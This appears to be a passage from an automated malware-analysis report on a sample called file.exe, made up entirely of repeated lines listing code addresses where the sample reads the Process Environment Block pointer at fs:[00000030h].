Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168656A mov eax, dword ptr fs:[00000030h]	2_2_0168656A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658550 mov eax, dword ptr fs:[00000030h]	2_2_01658550
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658550 mov eax, dword ptr fs:[00000030h]	2_2_01658550
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]	2_2_01660535
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]	2_2_01660535
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]	2_2_01660535
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]	2_2_01660535
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]	2_2_01660535
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660535 mov eax, dword ptr fs:[00000030h]	2_2_01660535
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]	2_2_0167E53E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]	2_2_0167E53E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]	2_2_0167E53E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]	2_2_0167E53E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]	2_2_0167E53E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E6500 mov eax, dword ptr fs:[00000030h]	2_2_016E6500
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]	2_2_01724500
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]	2_2_01724500
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]	2_2_01724500
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]	2_2_01724500
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]	2_2_01724500
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]	2_2_01724500
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]	2_2_01724500
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0167E5E7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0167E5E7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0167E5E7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0167E5E7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0167E5E7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0167E5E7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0167E5E7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0167E5E7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016525E0 mov eax, dword ptr fs:[00000030h]	2_2_016525E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168C5ED mov eax, dword ptr fs:[00000030h]	2_2_0168C5ED
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168C5ED mov eax, dword ptr fs:[00000030h]	2_2_0168C5ED
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E5CF mov eax, dword ptr fs:[00000030h]	2_2_0168E5CF
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E5CF mov eax, dword ptr fs:[00000030h]	2_2_0168E5CF
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016565D0 mov eax, dword ptr fs:[00000030h]	2_2_016565D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0168A5D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0168A5D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D05A7 mov eax, dword ptr fs:[00000030h]	2_2_016D05A7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D05A7 mov eax, dword ptr fs:[00000030h]	2_2_016D05A7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D05A7 mov eax, dword ptr fs:[00000030h]	2_2_016D05A7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016745B1 mov eax, dword ptr fs:[00000030h]	2_2_016745B1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016745B1 mov eax, dword ptr fs:[00000030h]	2_2_016745B1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01684588 mov eax, dword ptr fs:[00000030h]	2_2_01684588
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01652582 mov eax, dword ptr fs:[00000030h]	2_2_01652582
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01652582 mov ecx, dword ptr fs:[00000030h]	2_2_01652582
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E59C mov eax, dword ptr fs:[00000030h]	2_2_0168E59C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DC460 mov ecx, dword ptr fs:[00000030h]	2_2_016DC460
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167A470 mov eax, dword ptr fs:[00000030h]	2_2_0167A470
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167A470 mov eax, dword ptr fs:[00000030h]	2_2_0167A470
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167A470 mov eax, dword ptr fs:[00000030h]	2_2_0167A470
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170A456 mov eax, dword ptr fs:[00000030h]	2_2_0170A456
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]	2_2_0168E443
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]	2_2_0168E443
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]	2_2_0168E443
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]	2_2_0168E443
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]	2_2_0168E443
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]	2_2_0168E443
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]	2_2_0168E443
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]	2_2_0168E443
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164645D mov eax, dword ptr fs:[00000030h]	2_2_0164645D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167245A mov eax, dword ptr fs:[00000030h]	2_2_0167245A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164C427 mov eax, dword ptr fs:[00000030h]	2_2_0164C427
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164E420 mov eax, dword ptr fs:[00000030h]	2_2_0164E420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164E420 mov eax, dword ptr fs:[00000030h]	2_2_0164E420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164E420 mov eax, dword ptr fs:[00000030h]	2_2_0164E420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]	2_2_016D6420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]	2_2_016D6420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]	2_2_016D6420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]	2_2_016D6420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]	2_2_016D6420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]	2_2_016D6420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]	2_2_016D6420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A430 mov eax, dword ptr fs:[00000030h]	2_2_0168A430
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01688402 mov eax, dword ptr fs:[00000030h]	2_2_01688402
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01688402 mov eax, dword ptr fs:[00000030h]	2_2_01688402
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01688402 mov eax, dword ptr fs:[00000030h]	2_2_01688402
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016504E5 mov ecx, dword ptr fs:[00000030h]	2_2_016504E5
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016564AB mov eax, dword ptr fs:[00000030h]	2_2_016564AB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016844B0 mov ecx, dword ptr fs:[00000030h]	2_2_016844B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DA4B0 mov eax, dword ptr fs:[00000030h]	2_2_016DA4B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170A49A mov eax, dword ptr fs:[00000030h]	2_2_0170A49A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01658770 mov eax, dword ptr fs:[00000030h]	2_2_01658770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168674D mov esi, dword ptr fs:[00000030h]	2_2_0168674D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168674D mov eax, dword ptr fs:[00000030h]	2_2_0168674D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168674D mov eax, dword ptr fs:[00000030h]	2_2_0168674D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DE75D mov eax, dword ptr fs:[00000030h]	2_2_016DE75D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650750 mov eax, dword ptr fs:[00000030h]	2_2_01650750
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D4755 mov eax, dword ptr fs:[00000030h]	2_2_016D4755
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692750 mov eax, dword ptr fs:[00000030h]	2_2_01692750
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692750 mov eax, dword ptr fs:[00000030h]	2_2_01692750
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168C720 mov eax, dword ptr fs:[00000030h]	2_2_0168C720
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168C720 mov eax, dword ptr fs:[00000030h]	2_2_0168C720
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168273C mov eax, dword ptr fs:[00000030h]	2_2_0168273C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168273C mov ecx, dword ptr fs:[00000030h]	2_2_0168273C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168273C mov eax, dword ptr fs:[00000030h]	2_2_0168273C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CC730 mov eax, dword ptr fs:[00000030h]	2_2_016CC730
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168C700 mov eax, dword ptr fs:[00000030h]	2_2_0168C700
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650710 mov eax, dword ptr fs:[00000030h]	2_2_01650710
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01680710 mov eax, dword ptr fs:[00000030h]	2_2_01680710
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016727ED mov eax, dword ptr fs:[00000030h]	2_2_016727ED
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016727ED mov eax, dword ptr fs:[00000030h]	2_2_016727ED
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016727ED mov eax, dword ptr fs:[00000030h]	2_2_016727ED
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DE7E1 mov eax, dword ptr fs:[00000030h]	2_2_016DE7E1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016547FB mov eax, dword ptr fs:[00000030h]	2_2_016547FB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016547FB mov eax, dword ptr fs:[00000030h]	2_2_016547FB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0165C7C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D07C3 mov eax, dword ptr fs:[00000030h]	2_2_016D07C3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016507AF mov eax, dword ptr fs:[00000030h]	2_2_016507AF
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017047A0 mov eax, dword ptr fs:[00000030h]	2_2_017047A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F678E mov eax, dword ptr fs:[00000030h]	2_2_016F678E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A660 mov eax, dword ptr fs:[00000030h]	2_2_0168A660
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A660 mov eax, dword ptr fs:[00000030h]	2_2_0168A660
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01682674 mov eax, dword ptr fs:[00000030h]	2_2_01682674
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171866E mov eax, dword ptr fs:[00000030h]	2_2_0171866E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171866E mov eax, dword ptr fs:[00000030h]	2_2_0171866E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166C640 mov eax, dword ptr fs:[00000030h]	2_2_0166C640
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166E627 mov eax, dword ptr fs:[00000030h]	2_2_0166E627
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01686620 mov eax, dword ptr fs:[00000030h]	2_2_01686620
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01688620 mov eax, dword ptr fs:[00000030h]	2_2_01688620
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165262C mov eax, dword ptr fs:[00000030h]	2_2_0165262C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE609 mov eax, dword ptr fs:[00000030h]	2_2_016CE609
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]	2_2_0166260B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]	2_2_0166260B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]	2_2_0166260B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]	2_2_0166260B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]	2_2_0166260B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]	2_2_0166260B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]	2_2_0166260B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692619 mov eax, dword ptr fs:[00000030h]	2_2_01692619
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D06F1 mov eax, dword ptr fs:[00000030h]	2_2_016D06F1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D06F1 mov eax, dword ptr fs:[00000030h]	2_2_016D06F1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE6F2 mov eax, dword ptr fs:[00000030h]	2_2_016CE6F2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE6F2 mov eax, dword ptr fs:[00000030h]	2_2_016CE6F2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE6F2 mov eax, dword ptr fs:[00000030h]	2_2_016CE6F2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE6F2 mov eax, dword ptr fs:[00000030h]	2_2_016CE6F2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0168A6C7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0168A6C7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0168C6A6
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016866B0 mov eax, dword ptr fs:[00000030h]	2_2_016866B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01654690 mov eax, dword ptr fs:[00000030h]	2_2_01654690
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01654690 mov eax, dword ptr fs:[00000030h]	2_2_01654690
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01676962 mov eax, dword ptr fs:[00000030h]	2_2_01676962
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01676962 mov eax, dword ptr fs:[00000030h]	2_2_01676962
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01676962 mov eax, dword ptr fs:[00000030h]	2_2_01676962
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0169096E mov eax, dword ptr fs:[00000030h]	2_2_0169096E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0169096E mov edx, dword ptr fs:[00000030h]	2_2_0169096E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0169096E mov eax, dword ptr fs:[00000030h]	2_2_0169096E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DC97C mov eax, dword ptr fs:[00000030h]	2_2_016DC97C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F4978 mov eax, dword ptr fs:[00000030h]	2_2_016F4978
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F4978 mov eax, dword ptr fs:[00000030h]	2_2_016F4978
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D0946 mov eax, dword ptr fs:[00000030h]	2_2_016D0946
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E892B mov eax, dword ptr fs:[00000030h]	2_2_016E892B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D892A mov eax, dword ptr fs:[00000030h]	2_2_016D892A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE908 mov eax, dword ptr fs:[00000030h]	2_2_016CE908
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CE908 mov eax, dword ptr fs:[00000030h]	2_2_016CE908
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01648918 mov eax, dword ptr fs:[00000030h]	2_2_01648918
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01648918 mov eax, dword ptr fs:[00000030h]	2_2_01648918
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DC912 mov eax, dword ptr fs:[00000030h]	2_2_016DC912
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_016DE9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016829F9 mov eax, dword ptr fs:[00000030h]	2_2_016829F9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016829F9 mov eax, dword ptr fs:[00000030h]	2_2_016829F9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171A9D3 mov eax, dword ptr fs:[00000030h]	2_2_0171A9D3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E69C0 mov eax, dword ptr fs:[00000030h]	2_2_016E69C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0165A9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0165A9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0165A9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0165A9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0165A9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0165A9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016849D0 mov eax, dword ptr fs:[00000030h]	2_2_016849D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016509AD mov eax, dword ptr fs:[00000030h]	2_2_016509AD
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016509AD mov eax, dword ptr fs:[00000030h]	2_2_016509AD
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D89B3 mov esi, dword ptr fs:[00000030h]	2_2_016D89B3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D89B3 mov eax, dword ptr fs:[00000030h]	2_2_016D89B3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D89B3 mov eax, dword ptr fs:[00000030h]	2_2_016D89B3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E6870 mov eax, dword ptr fs:[00000030h]	2_2_016E6870
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E6870 mov eax, dword ptr fs:[00000030h]	2_2_016E6870
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DE872 mov eax, dword ptr fs:[00000030h]	2_2_016DE872
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DE872 mov eax, dword ptr fs:[00000030h]	2_2_016DE872
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01662840 mov ecx, dword ptr fs:[00000030h]	2_2_01662840
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01654859 mov eax, dword ptr fs:[00000030h]	2_2_01654859
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01654859 mov eax, dword ptr fs:[00000030h]	2_2_01654859
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01680854 mov eax, dword ptr fs:[00000030h]	2_2_01680854
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]	2_2_01672835
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]	2_2_01672835
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]	2_2_01672835
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01672835 mov ecx, dword ptr fs:[00000030h]	2_2_01672835
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]	2_2_01672835
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]	2_2_01672835
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F483A mov eax, dword ptr fs:[00000030h]	2_2_016F483A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F483A mov eax, dword ptr fs:[00000030h]	2_2_016F483A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]	2_2_0168A830
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DC810 mov eax, dword ptr fs:[00000030h]	2_2_016DC810
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0168C8F9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0168C8F9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171A8E4 mov eax, dword ptr fs:[00000030h]	2_2_0171A8E4
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0167E8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650887 mov eax, dword ptr fs:[00000030h]	2_2_01650887
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DC89D mov eax, dword ptr fs:[00000030h]	2_2_016DC89D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164CB7E mov eax, dword ptr fs:[00000030h]	2_2_0164CB7E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F8B42 mov eax, dword ptr fs:[00000030h]	2_2_016F8B42
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E6B40 mov eax, dword ptr fs:[00000030h]	2_2_016E6B40
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E6B40 mov eax, dword ptr fs:[00000030h]	2_2_016E6B40
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171AB40 mov eax, dword ptr fs:[00000030h]	2_2_0171AB40
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01704B4B mov eax, dword ptr fs:[00000030h]	2_2_01704B4B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01704B4B mov eax, dword ptr fs:[00000030h]	2_2_01704B4B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FEB50 mov eax, dword ptr fs:[00000030h]	2_2_016FEB50
